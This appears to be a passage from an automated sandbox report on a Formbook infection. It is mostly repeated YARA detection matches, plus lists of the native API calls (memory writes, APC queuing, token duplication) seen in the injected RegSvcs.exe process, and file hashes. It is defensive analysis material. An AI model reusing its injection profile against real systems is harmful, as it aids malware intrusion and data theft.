              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3360, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: ipconfig.exe PID: 3780, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5336, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: netsh.exe PID: 1508, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: netsh.exe PID: 5472, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 2940, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A330 NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A3E0 NtReadFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A460 NtClose
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A510 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A2EB NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A32A NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_0041A382 NtReadFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2F90 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B4340 NtSetContextThread
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B4650 NtSuspendThread
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2BE0 NtQueryValueKey
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2BA0 NtEnumerateValueKey
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2B80 NtQueryInformationFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2AF0 NtWriteFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2AB0 NtWaitForSingleObject
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2D00 NtSetInformationFile
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2DB0 NtEnumerateKey
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2C60 NtCreateKey
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2C00 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2CF0 NtOpenProcess
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2CC0 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2F60 NtCreateProcessEx
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2FA0 NtQuerySection
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2E30 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B2EE0 NtQueueApcThread
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B3010 NtOpenDirectoryObject
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B3090 NtSetValueKey
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B35C0 NtCreateMutant
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B39B0 NtGetContextThread
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B3D70 NtOpenThread
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 15_2_016B3D10 NtOpenProcessToken
Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A29B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_00591A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0059F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: String function: 0054FD60 appears 40 times
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: String function: 00550DC0 appears 46 times
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: String function: 00A457D8 appears 67 times
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: String function: 00A457A5 appears 34 times
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: String function: 00A46630 appears 31 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 016EEA12 appears 85 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 016B5130 appears 58 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 01A37E54 appears 97 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 016FF290 appears 105 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 0166B970 appears 275 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 01A5EA12 appears 37 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: String function: 016C7E54 appears 101 times
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs M1Y6kc9FpE.exe
              Source: M1Y6kc9FpE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
